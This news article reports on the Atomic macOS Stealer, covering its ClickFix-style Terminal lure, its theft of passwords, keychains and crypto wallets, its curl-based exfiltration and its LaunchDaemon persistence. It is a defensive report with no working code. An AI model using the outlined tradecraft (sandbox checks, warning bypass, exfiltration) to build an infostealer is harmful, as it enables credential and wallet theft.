- AMOS relies on users executing malicious terminal commands themselves
- Sophos MDR identified ClickFix-like social engineering in macOS attacks
- Half of the macOS theft reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits common user behavior by tricking users into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-like ruse persuaded a victim to manually execute a malicious line of code.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noticing similar social engineering tactics in several macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than doubling the detection rate of any other macOS malware family during the same period.
Furthermore, nearly half of all macOS 20s customer reports in the past three months involved AMOS or its close variants.
Security firms have been tracking this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant called SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How the malware harvests passwords and data
After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass in the user’s home directory.
Once the password is secured, AMOS downloads a secondary payload that strips extended attributes to bypass macOS security warnings.
The hijacker also checks whether it is running inside a virtual machine or a sandbox environment by querying system_profiler data for indicators such as QEMU, VMware or KVM.
The malware then proceeds to harvest a wide variety of sensitive information, including the macOS keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto tool before being transferred to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after each system reboot.
Despite the seriousness of AMOS, it’s worth questioning whether security vendors are overestimating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent – someone has to willingly insert and run a Terminal command – creates a significant barrier that tech-savvy users can easily avoid.
Furthermore, Apple’s ongoing improvements to Gatekeeper, XProtect and notarization requirements can render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the unpleasant truth that no platform is immune to users who ignore basic security warnings.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds.
